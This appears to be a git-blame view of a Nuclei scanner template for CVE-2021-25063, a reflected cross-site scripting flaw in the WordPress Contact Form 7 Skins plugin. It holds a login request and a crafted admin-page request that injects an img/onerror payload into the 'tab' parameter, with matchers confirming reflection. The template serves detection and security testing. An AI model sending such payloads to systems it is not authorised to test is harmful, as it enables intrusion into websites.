2022-02-19 11:24:34 +00:00
id : CVE-2021-25063
info :
2022-08-29 13:55:23 +00:00
name : WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting
2022-02-19 11:24:34 +00:00
author : dhiyaneshDk
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25063
2022-02-19 11:25:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-19 11:25:57 +00:00
cve-id : CVE-2021-25063
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : wpscan,cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated
2022-02-19 11:24:34 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-22 07:45:25 +00:00
GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
2022-02-19 11:24:34 +00:00
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-22 07:45:25 +00:00
- "<img src onerror=alert(document.domain)>' type='hidden"
2022-02-19 11:24:34 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28